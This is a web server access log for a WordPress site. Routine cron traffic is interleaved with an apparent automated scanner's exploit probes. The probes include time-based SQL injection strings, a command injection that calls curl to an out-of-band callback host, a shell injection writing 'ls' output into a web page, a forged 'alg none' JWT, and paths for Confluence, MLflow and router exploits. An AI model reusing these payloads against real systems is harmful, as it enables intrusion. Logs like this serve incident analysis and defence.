165.232.54.158 - - [14/Jan/2026:01:29:42 +0800] "POST /jeecg-boot/jmreport/qurestSql HTTP/1.1" 404 10857 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36"
165.232.54.158 - - [14/Jan/2026:01:31:01 +0800] "GET / HTTP/1.1" 200 16720 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 12) AppleWebKit/620.19 (KHTML, like Gecko) Version/17.6.32 Safari/620.19"
103.4.122.14 - - [14/Jan/2026:01:31:03 +0800] "POST /wp-cron.php?doing_wp_cron=1768325463.8255610466003417968750 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [14/Jan/2026:01:30:59 +0800] "POST /wbm/plugins/wbm-legal-information/platform/pfcXXX/licenses.php HTTP/1.1" 404 10857 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0"
103.4.122.14 - - [14/Jan/2026:01:31:08 +0800] "POST /wp-cron.php?doing_wp_cron=1768325468.2667169570922851562500 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [14/Jan/2026:01:31:05 +0800] "GET /queues HTTP/1.1" 404 10865 "-" "Mozilla/5.0 (Knoppix; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36"
103.4.122.14 - - [14/Jan/2026:01:31:17 +0800] "POST /wp-cron.php?doing_wp_cron=1768325477.2579109668731689453125 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [14/Jan/2026:01:31:14 +0800] "POST /index.php?c=blocked&action=continue HTTP/1.1" 200 10785 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36"
103.4.122.14 - - [14/Jan/2026:01:33:28 +0800] "POST /wp-cron.php?doing_wp_cron=1768325608.7688660621643066406250 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [14/Jan/2026:01:33:25 +0800] "POST /saas./resttosaasservlet HTTP/1.1" 404 10868 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36"
165.232.54.158 - - [14/Jan/2026:01:33:28 +0800] "POST /cgi-bin/luci/;stok=/locale?form=country HTTP/1.1" 404 10857 "-" "Mozilla/5.0 (ZZ; Linux x86_64; rv:135.0) Gecko/20100101 Firefox/135.0"
103.4.122.14 - - [14/Jan/2026:01:33:37 +0800] "POST /wp-cron.php?doing_wp_cron=1768325617.3011240959167480468750 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [14/Jan/2026:01:33:34 +0800] "POST /cgi-bin/luci/;stok=/locale?form=country HTTP/1.1" 404 10857 "-" "Mozilla/5.0 (Ubuntu; Linux x86_64; rv:121.0) Gecko/20100101 Firefox/121.0"
103.4.122.14 - - [14/Jan/2026:01:36:47 +0800] "POST /wp-cron.php?doing_wp_cron=1768325807.6597371101379394531250 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [14/Jan/2026:01:36:44 +0800] "GET /api/v2/parameters/core/ HTTP/1.1" 404 10857 "-" "7h3h4ckv157"
165.232.54.158 - - [14/Jan/2026:01:36:46 +0800] "GET /csrf HTTP/1.1" 404 10864 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.3 Safari/605.1.15"
103.4.122.14 - - [14/Jan/2026:01:37:07 +0800] "POST /wp-cron.php?doing_wp_cron=1768325827.4027340412139892578125 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [14/Jan/2026:01:37:04 +0800] "POST /ajax-api/2.0/mlflow/registered-models/create HTTP/1.1" 404 10857 "-" "Mozilla/5.0 (SS; Linux i686; rv:123.0) Gecko/20100101 Firefox/123.0"
103.4.122.14 - - [14/Jan/2026:01:37:14 +0800] "POST /wp-cron.php?doing_wp_cron=1768325834.1725399494171142578125 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [14/Jan/2026:01:37:11 +0800] "POST /ajax-api/2.0/mlflow/model-versions/create HTTP/1.1" 404 10857 "-" "Mozilla/5.0 (Ubuntu; Linux i686; rv:129.0) Gecko/20100101 Firefox/129.0"
103.4.122.14 - - [14/Jan/2026:01:37:52 +0800] "POST /wp-cron.php?doing_wp_cron=1768325872.5419290065765380859375 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [14/Jan/2026:01:37:49 +0800] "POST /kubepi/api/v1/users HTTP/1.1" 404 10857 "-" "Mozilla/5.0 (Windows NT 6.2; rv:137.0) Gecko/20100101 Firefox/137.0"
103.4.122.14 - - [14/Jan/2026:01:38:09 +0800] "POST /wp-cron.php?doing_wp_cron=1768325889.3242669105529785156250 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [14/Jan/2026:01:38:06 +0800] "POST /kubepi/api/v1/systems/login/logs/search?pageNum=1&&pageSize=10 HTTP/1.1" 404 10857 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.75 Safari/537.36"
165.232.54.158 - - [14/Jan/2026:01:40:11 +0800] "GET /index.html HTTP/1.1" 200 1953 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.1.2 Safari/605.1.15"
165.232.54.158 - - [14/Jan/2026:01:40:15 +0800] "POST /api/operations/ciscosb-file:form-file-upload HTTP/1.1" 403 6629 "-" "Mozilla/5.0 (Debian; Linux i686; rv:126.0) Gecko/20100101 Firefox/126.0"
165.232.54.158 - - [14/Jan/2026:01:40:19 +0800] "GET /index.html HTTP/1.1" 200 1953 "-" "Mozilla/5.0 (Fedora; Linux x86_64; rv:130.0) Gecko/20100101 Firefox/130.0"
103.4.122.14 - - [14/Jan/2026:01:41:13 +0800] "POST /wp-cron.php?doing_wp_cron=1768326073.3199000358581542968750 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
103.4.122.14 - - [14/Jan/2026:01:41:11 +0800] "POST /?wordfence_syncAttackData=1768326071.742 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [14/Jan/2026:01:41:09 +0800] "POST /json/setup-restore.action HTTP/1.1" 404 10872 "-" "Mozilla/5.0 (Ubuntu; Linux x86_64; rv:129.0) Gecko/20100101 Firefox/129.0"
103.4.122.14 - - [14/Jan/2026:01:41:17 +0800] "POST /wp-cron.php?doing_wp_cron=1768326077.5980889797210693359375 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
103.4.122.14 - - [14/Jan/2026:01:41:15 +0800] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 21 "-" "WordPress/6.9; https://nutritaste.com.au"
103.4.122.14 - - [14/Jan/2026:01:41:40 +0800] "POST /wp-cron.php?doing_wp_cron=1768326100.5433270931243896484375 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [14/Jan/2026:01:41:37 +0800] "POST /%77eb%75i_%77sma_Http HTTP/1.1" 404 10877 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
103.4.122.14 - - [14/Jan/2026:01:41:47 +0800] "POST /wp-cron.php?doing_wp_cron=1768326107.2638359069824218750000 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [14/Jan/2026:01:41:44 +0800] "POST /%2577eb%2575i_%2577sma_Http HTTP/1.1" 404 10878 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
165.232.54.158 - - [14/Jan/2026:01:41:45 +0800] "POST /template/aui/text-inline.vm HTTP/1.1" 404 10857 "-" "Mozilla/5.0 (CentOS; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
103.4.122.14 - - [14/Jan/2026:01:41:53 +0800] "POST /wp-cron.php?doing_wp_cron=1768326113.1867170333862304687500 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [14/Jan/2026:01:41:50 +0800] "POST /%2577ebui_wsma_https HTTP/1.1" 404 10875 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
103.4.122.14 - - [14/Jan/2026:01:42:58 +0800] "POST /wp-cron.php?doing_wp_cron=1768326178.7613589763641357421875 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [14/Jan/2026:01:42:55 +0800] "GET /api/auth/cognito/callback?access_token=nysrrkpf&id_token=eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0.eyJjb2duaXRvOnVzZXJuYW1lIjoibm9ybmJqYnBnZCIsImVtYWlsIjoie3tlbWFpbH19In0=. HTTP/1.1" 404 10857 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36"
165.232.54.158 - - [14/Jan/2026:01:43:14 +0800] "GET /downloader.php?file=%3Becho+CVE-2023-23333|rev%00.zip HTTP/1.1" 403 199 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
103.4.122.14 - - [14/Jan/2026:01:43:23 +0800] "POST /wp-cron.php?doing_wp_cron=1768326203.5515019893646240234375 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [14/Jan/2026:01:43:20 +0800] "POST /index.php HTTP/1.1" 200 10787 "-" "Mozilla/5.0 (Knoppix; Linux x86_64; rv:133.0) Gecko/20100101 Firefox/133.0"
165.232.54.158 - - [14/Jan/2026:01:45:03 +0800] "GET / HTTP/1.1" 200 16720 "-" "Mozilla/5.0 (ZZ; Linux i686; rv:132.0) Gecko/20100101 Firefox/132.0"
103.4.122.14 - - [14/Jan/2026:01:45:08 +0800] "POST /wp-cron.php?doing_wp_cron=1768326308.7240009307861328125000 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [14/Jan/2026:01:45:05 +0800] "POST /spcgi.cgi HTTP/1.1" 404 10867 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0"
103.4.122.14 - - [14/Jan/2026:01:48:29 +0800] "POST /wp-cron.php?doing_wp_cron=1768326509.7478229999542236328125 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [14/Jan/2026:01:48:26 +0800] "GET /wp-content/plugins/userpro/css/userpro.min.css HTTP/1.1" 404 10857 "-" "Mozilla/5.0 (Debian; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36"
165.232.54.158 - - [14/Jan/2026:01:48:31 +0800] "POST /ajax/api/user/save HTTP/1.1" 403 199 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.2 Safari/605.1.15"
165.232.54.158 - - [14/Jan/2026:01:48:37 +0800] "GET /?rest_route=/pmpro/v1/order&code=a%27%20OR%20(SELECT%201%20FROM%20(SELECT(SLEEP(7)))a)--%20- HTTP/1.1" 403 6628 "-" "Mozilla/5.0 (Debian; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36"
165.232.54.158 - - [14/Jan/2026:01:48:44 +0800] "GET /wp-admin/admin-ajax.php?action=edd_download_search&s=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.1" 403 6626 "-" "Mozilla/5.0 (Kubuntu; Linux i686; rv:129.0) Gecko/20100101 Firefox/129.0"
103.4.122.14 - - [14/Jan/2026:01:48:44 +0800] "POST /wp-cron.php?doing_wp_cron=1768326524.7563281059265136718750 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
103.4.122.14 - - [14/Jan/2026:01:48:43 +0800] "POST /?wordfence_syncAttackData=1768326523.2409 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [14/Jan/2026:01:48:41 +0800] "GET /wp-content/plugins/paid-memberships-pro/js/updates.js HTTP/1.1" 404 10857 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.18363"
103.4.122.14 - - [14/Jan/2026:01:48:51 +0800] "POST /wp-cron.php?doing_wp_cron=1768326531.4996678829193115234375 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [14/Jan/2026:01:48:48 +0800] "GET /wp-content/plugins/easy-digital-downloads/readme.txt HTTP/1.1" 404 10857 "-" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2486.0 Safari/537.36 Edge/13.10586"
103.4.122.14 - - [14/Jan/2026:01:49:58 +0800] "POST /wp-cron.php?doing_wp_cron=1768326598.3129210472106933593750 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
103.4.122.14 - - [14/Jan/2026:01:49:56 +0800] "POST /?wordfence_syncAttackData=1768326596.692 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [14/Jan/2026:01:49:54 +0800] "POST /druid/indexer/v1/sampler?for=connect HTTP/1.1" 404 10857 "-" "Mozilla/5.0 (Kubuntu; Linux x86_64; rv:131.0) Gecko/20100101 Firefox/131.0"
165.232.54.158 - - [14/Jan/2026:01:51:37 +0800] "GET / HTTP/1.1" 200 16720 "-" "Mozilla/5.0 (Macintosh: Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.3 Safari/605.1.15"
103.4.122.14 - - [14/Jan/2026:01:52:15 +0800] "POST /wp-cron.php?doing_wp_cron=1768326735.6687870025634765625000 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [14/Jan/2026:01:52:12 +0800] "POST /api/jmeter/download/files HTTP/1.1" 404 10857 "-" "Mozilla/5.0 (Kubuntu; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36"
103.4.122.14 - - [14/Jan/2026:01:52:28 +0800] "POST /wp-cron.php?doing_wp_cron=1768326748.4712729454040527343750 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [14/Jan/2026:01:52:25 +0800] "GET /forms/doLogin?login_username=admin&password=password$(curl%20d5iu610i9qj8svou82p0imdgxd6ra6u7c.oast.fun)&x=0&y=0 HTTP/1.1" 404 10863 "-" "Mozilla/5.0 (Debian; Linux i686; rv:132.0) Gecko/20100101 Firefox/132.0"
103.4.122.14 - - [14/Jan/2026:01:53:09 +0800] "POST /wp-cron.php?doing_wp_cron=1768326789.7307500839233398437500 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [14/Jan/2026:01:53:06 +0800] "GET /geoserver/ows?service=WFS&version=1.0.0&request=GetCapabilities HTTP/1.1" 404 10861 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
103.4.122.14 - - [14/Jan/2026:01:53:34 +0800] "POST /wp-cron.php?doing_wp_cron=1768326814.5684990882873535156250 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [14/Jan/2026:01:53:31 +0800] "POST /cgi-bin/fax_change_faxtrace_settings HTTP/1.1" 404 10875 "-" "Mozilla/5.0 (SS; Linux x86_64; rv:134.0) Gecko/20100101 Firefox/134.0"
165.232.54.158 - - [14/Jan/2026:01:53:32 +0800] "GET /index.php HTTP/1.1" 301 - "-" "Mozilla/5.0 (CentOS; Linux i686; rv:130.0) Gecko/20100101 Firefox/130.0"
103.4.122.14 - - [14/Jan/2026:01:54:16 +0800] "POST /wp-cron.php?doing_wp_cron=1768326856.7797040939331054687500 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [14/Jan/2026:01:54:13 +0800] "POST /WebServiceImpl/services/FlashServiceImpl HTTP/1.1" 404 10857 "-" "Mozilla/5.0 (SS; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36"
103.4.122.14 - - [14/Jan/2026:01:55:43 +0800] "POST /wp-cron.php?doing_wp_cron=1768326943.6916790008544921875000 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [14/Jan/2026:01:55:40 +0800] "POST /api/2.0/mlflow/registered-models/create HTTP/1.1" 404 10857 "-" "Mozilla/5.0 (SS; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36"
103.4.122.14 - - [14/Jan/2026:01:55:50 +0800] "POST /wp-cron.php?doing_wp_cron=1768326950.4276790618896484375000 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [14/Jan/2026:01:55:47 +0800] "POST /api/2.0/mlflow/model-versions/create HTTP/1.1" 404 10857 "-" "Mozilla/5.0 (Macintosh, Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.3 Safari/605.1.15"
103.4.122.14 - - [14/Jan/2026:01:57:51 +0800] "POST /wp-cron.php?doing_wp_cron=1768327071.7990829944610595703125 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [14/Jan/2026:01:57:48 +0800] "GET /hax/..CFIDE/adminapi/administrator.cfc?method=getBuildNumber&_cfclient=true HTTP/1.1" 404 10857 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:132.0) Gecko/20100101 Firefox/132.0"
165.232.54.158 - - [14/Jan/2026:02:01:34 +0800] "GET / HTTP/1.1" 200 16720 "-" "Mozilla/5.0 (CentOS; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36"
165.232.54.158 - - [14/Jan/2026:02:01:51 +0800] "GET / HTTP/1.1" 200 16720 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6.1 Safari/605.1.15"
103.4.122.14 - - [14/Jan/2026:02:02:08 +0800] "POST /wp-cron.php?doing_wp_cron=1768327328.7312080860137939453125 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [14/Jan/2026:02:02:05 +0800] "GET /setup/setupadministrator-start.action HTTP/1.1" 404 10876 "-" "Mozilla/5.0 (Ubuntu; Linux i686; rv:127.0) Gecko/20100101 Firefox/127.0"
103.4.122.14 - - [14/Jan/2026:02:02:19 +0800] "POST /wp-cron.php?doing_wp_cron=1768327339.2882230281829833984375 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [14/Jan/2026:02:02:16 +0800] "GET /server-info.action?bootstrapStatusProvider.applicationConfig.setupComplete=0&cache38Btk9BS8Dl8xahLvqItpwq4GS0 HTTP/1.1" 404 10873 "-" "Mozilla/5.0 (Fedora; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
103.4.122.14 - - [14/Jan/2026:02:02:29 +0800] "POST /wp-cron.php?doing_wp_cron=1768327349.2165889739990234375000 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [14/Jan/2026:02:02:26 +0800] "GET /setup/setupadministrator-start.action HTTP/1.1" 404 10876 "-" "Mozilla/5.0 (Ubuntu; Linux x86_64; rv:125.0) Gecko/20100101 Firefox/125.0"
103.4.122.14 - - [14/Jan/2026:02:02:38 +0800] "POST /wp-cron.php?doing_wp_cron=1768327358.2182428836822509765625 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [14/Jan/2026:02:02:35 +0800] "POST /setup/setupadministrator.action HTTP/1.1" 404 10873 "-" "Mozilla/5.0 (Fedora; Linux x86_64; rv:122.0) Gecko/20100101 Firefox/122.0"
103.4.122.14 - - [14/Jan/2026:02:02:48 +0800] "POST /wp-cron.php?doing_wp_cron=1768327368.1869199275970458984375 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [14/Jan/2026:02:02:45 +0800] "POST /dologin.action HTTP/1.1" 404 10872 "-" "Mozilla/5.0 (ZZ; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36"
103.4.122.14 - - [14/Jan/2026:02:02:58 +0800] "POST /wp-cron.php?doing_wp_cron=1768327378.2379291057586669921875 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [14/Jan/2026:02:02:55 +0800] "GET /welcome.action HTTP/1.1" 404 10872 "-" "Mozilla/5.0 (Debian; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36"
103.4.122.14 - - [14/Jan/2026:02:05:09 +0800] "POST /wp-cron.php?doing_wp_cron=1768327509.7281270027160644531250 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [14/Jan/2026:02:05:06 +0800] "GET /session/login HTTP/1.1" 404 10861 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0.1 Safari/605.1.15"
165.232.54.158 - - [14/Jan/2026:02:07:02 +0800] "POST /inc/jquery/uploadify/uploadify.php HTTP/1.1" 403 199 "-" "Mozilla/5.0 (Ubuntu; Linux i686; rv:121.0) Gecko/20100101 Firefox/121.0"
165.232.54.158 - - [14/Jan/2026:02:07:11 +0800] "GET /cgi-bin/network_config/nsg_masq.cgi?user_name=admin&session_id=../&lang=zh_CN.UTF-8&act=2&proto=;ls>/usr/local/lyx/lyxcenter/web/ETeu.html; HTTP/1.1" 403 199 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Safari/605.1.15"
103.4.122.14 - - [14/Jan/2026:02:07:13 +0800] "POST /wp-cron.php?doing_wp_cron=1768327633.3732540607452392578125 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [14/Jan/2026:02:07:09 +0800] "POST /attachment/2/cbccb.php HTTP/1.1" 404 10857 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36"
165.232.54.158 - - [14/Jan/2026:02:07:11 +0800] "POST /rpc/api/rest/master/user/createInternalUser;/keepalive HTTP/1.1" 404 10857 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.0 Safari/605.1.15"
103.4.122.14 - - [14/Jan/2026:02:07:21 +0800] "POST /wp-cron.php?doing_wp_cron=1768327641.3420701026916503906250 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [14/Jan/2026:02:07:18 +0800] "GET /ETeu.html HTTP/1.1" 404 10867 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.2 Safari/605.1.15"
103.4.122.14 - - [14/Jan/2026:02:08:23 +0800] "POST /wp-cron.php?doing_wp_cron=1768327703.0956509113311767578125 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [14/Jan/2026:02:08:19 +0800] "GET /api/v1/users HTTP/1.1" 404 10857 "-" "Mozilla/5.0 (Mac OS X 13_2) AppleWebKit/537.36 (KHTML, like Gecko) Edge/107.0 Safari/537.36"
165.232.54.158 - - [14/Jan/2026:02:08:52 +0800] "GET /module/tshirtecommerce/designer?product_id=900982561&parent_id=1;SELECT%20SLEEP(8); HTTP/1.1" 403 199 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.1.2 Safari/605.1.15"
165.232.54.158 - - [14/Jan/2026:02:09:56 +0800] "GET /wp-json/wp/v2/users HTTP/1.1" 403 199 "-" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Safari/106.0 Safari/537.36"
103.4.122.14 - - [14/Jan/2026:02:10:00 +0800] "POST /wp-cron.php?doing_wp_cron=1768327800.4526479244232177734375 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [14/Jan/2026:02:09:57 +0800] "GET /?rest_route=/wp/v2/users HTTP/1.1" 401 110 "-" "Mozilla/5.0 (ZZ; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36"
103.4.122.14 - - [14/Jan/2026:02:11:58 +0800] "POST /wp-cron.php?doing_wp_cron=1768327918.4167959690093994140625 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [14/Jan/2026:02:11:55 +0800] "GET /wp-json/wp/v2/add-listing?id=1 HTTP/1.1" 404 117 "-" "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36"
103.4.122.14 - - [14/Jan/2026:02:12:07 +0800] "POST /wp-cron.php?doing_wp_cron=1768327927.2657709121704101562500 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [14/Jan/2026:02:12:05 +0800] "GET /wp-admin/profile.php HTTP/1.1" 302 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36"
103.4.122.14 - - [14/Jan/2026:02:13:47 +0800] "POST /wp-cron.php?doing_wp_cron=1768328027.6537749767303466796875 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [14/Jan/2026:02:13:44 +0800] "GET /spip.php?page=spip_pass HTTP/1.1" 404 10866 "-" "Mozilla/5.0 (ZZ; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
103.4.122.14 - - [14/Jan/2026:02:14:39 +0800] "POST /wp-cron.php?doing_wp_cron=1768328079.0451209545135498046875 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
192.71.142.40 - - [14/Jan/2026:02:14:37 +0800] "GET / HTTP/1.1" 301 - "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 17_3_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.3.1 Mobile/15E148 Safari/604"
192.71.126.53 - - [14/Jan/2026:02:14:40 +0800] "GET / HTTP/1.1" 200 16322 "http://nutritaste.com.au/" "Mozilla/5.0 (iPhone; CPU iPhone OS 17_3_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.3.1 Mobile/15E148 Safari/604"
103.4.122.14 - - [14/Jan/2026:02:14:45 +0800] "POST /wp-cron.php?doing_wp_cron=1768328085.5250430107116699218750 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
192.71.2.56 - - [14/Jan/2026:02:14:43 +0800] "GET /brochure/ HTTP/1.1" 200 11510 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 17_3_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.3.1 Mobile/15E148 Safari/604"
165.232.54.158 - - [14/Jan/2026:02:15:01 +0800] "POST /tshirtecommerce/ajax.php?type=svg HTTP/1.1" 403 6628 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_0) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0 Safari/605.1.15"
165.232.54.158 - - [14/Jan/2026:02:15:03 +0800] "GET / HTTP/1.1" 200 16720 "-" "Mozilla/5.0 (Macintosh, Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.2 Safari/605.1.15"
165.232.54.158 - - [14/Jan/2026:02:21:04 +0800] "POST / HTTP/1.1" 403 6628 "-" "Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
165.232.54.158 - - [14/Jan/2026:02:21:09 +0800] "GET / HTTP/1.1" 200 16720 "-" "Mozilla/5.0 (ZZ; Linux x86_64; rv:133.0) Gecko/20100101 Firefox/133.0"
